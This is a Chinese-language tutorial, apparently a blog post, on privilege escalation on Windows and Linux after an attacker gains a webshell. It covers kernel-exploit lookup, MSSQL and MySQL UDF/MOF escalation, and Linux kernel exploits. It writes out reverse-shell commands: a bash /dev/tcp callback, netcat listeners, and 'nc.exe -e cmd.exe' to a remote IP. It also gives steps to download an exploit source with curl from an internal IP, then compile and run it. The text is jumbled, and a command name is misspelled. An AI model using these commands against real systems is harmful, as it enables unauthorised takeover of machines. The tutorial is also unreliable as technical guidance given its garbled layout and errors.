1. 程式人生 > >windows和linux提權

windows和linux提權

前提:拿到wbshell後做的事情webshell 通常繼承了web 使用者的許可權通常情況下,web使用者的許可權是比較低的   許可權提升1:獲取其他使用者的訪問許可權,甚至是管理員。      ! 水平許可權提升(越權)(普通使用者更改普通使用者的帖子)                對一個論壇來說 :                            超級管理員(管理所有)、版主(管理一版的帖子)、普通使用者(管裡自己的帖子)                                                                                                                 A|B      !垂直許可權提升(更改版主或超級管理員的貼子)       !如果以上兩種情況,發生在web、App中               失效的訪問控制:就是未對通過身份驗證的使用者實施恰當的訪問控制。攻擊者可以利用這些缺陷訪問未經授權的功能或資料,例如:訪問其他使用者的賬戶、檢視敏感檔案、修改其他使用者的資料、更改訪問許可權等。對於系統來說,就是“提權”,目標是獲取root/administrator的許可權。提權的分類:   水平許可權提升、垂直許可權提升依據作業系統分類:編譯器:  windows系統:提權方式:        作業系統漏洞提權:            步驟:1獲取系統資訊                        命令是:systminfo                                  根據沒有修補的補丁號碼,直接在網上找 利用程式   網址:www.7kb.org/138.html                                漏洞(系統漏洞msxx-xx)與補丁(kB)的對應關係                                   PR提權:win2003
                                        MS09-012                                   巴西烤肉提權                       2 直接用exp,exp就是編譯好的針對某一漏洞的exe程式          第三方服務提權                就是資料庫提權                    分兩種:1:MSSQL 提取                                       關鍵步驟:就是獲取sa使用者的密碼                                            條件:資料庫的埠、地址   sa  sa使用者的密碼                                   2::MYSQL 提權                                 分兩種:1:UDF 提權                                               2:MOF提權            其他資料庫    VNC   PCanywhere .........linux系統:自帶的編譯器:gcc  1:利用系統漏洞進行提權             一;瞭解目標作業系統的核心版本號,去查詢對應的能提權的漏洞     命令:• cat /proc/version(系統版本資訊)
        • uname -a(核心查詢)                                          • uname -mrs+-                                          • rpm -q kernel                                          • dmesg | grep Linux
                                           • ls /boot | grep vmlinuz                 1;shell反彈                    監聽埠   nc.exe -lvvp 4444    /bin/bash -i >& /dev/tcp/ip地址/4444(埠號) 0<&1

                    查詢提權的漏洞    kali中:searchsploit+系統
                    下載提權exp.c                    curl http://172.18.199.91/35370.c > exp.c                     編譯並且執行                     gcc exp.c -o exploit -lpthread                      ./exploit提權實戰1   如果對方windows系統,並且使用套件搭建服務,獲取的webshell,即是system許可權    常見的套件: xampp   wamp    phpstudy內網滲透1   nc shell 反彈     客戶端首先執行    nc.exe -lvvp 777(埠號)     伺服器端執行     nc.exe -e cmd.exe 遠端IP地址 埠號